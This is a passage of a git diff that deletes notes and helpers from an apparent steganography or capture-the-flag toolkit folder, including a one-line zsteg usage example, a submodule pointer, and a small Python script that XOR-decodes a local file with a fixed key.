a/stego/docs/zsteg.md +++ /dev/null @@ -1,8 +0,0 @@ -# zsteg - -* PNGs, BMPs - -* Example -```sh -zsteg png1.png --strings all -``` diff --git a/stego/stego-toolkit b/stego/stego-toolkit deleted file mode 160000 index 4e6c2da..0000000 --- a/stego/stego-toolkit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348 diff --git a/stego/xor_key_file.py b/stego/xor_key_file.py deleted file mode 100644 index c79d223..0000000 --- a/stego/xor_key_file.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/env python - -def xor(data, key): - keylen = len(key) - return bytearray(( - (data[i] ^ key[i % keylen]) for i in range(0,len(data)) - )) - - -if __name__ == "__main__": - data = bytearray(open('topsecret.txt', 'rb').read()) - key = b'key' - res = xor(data, key) - print(res.decode()) -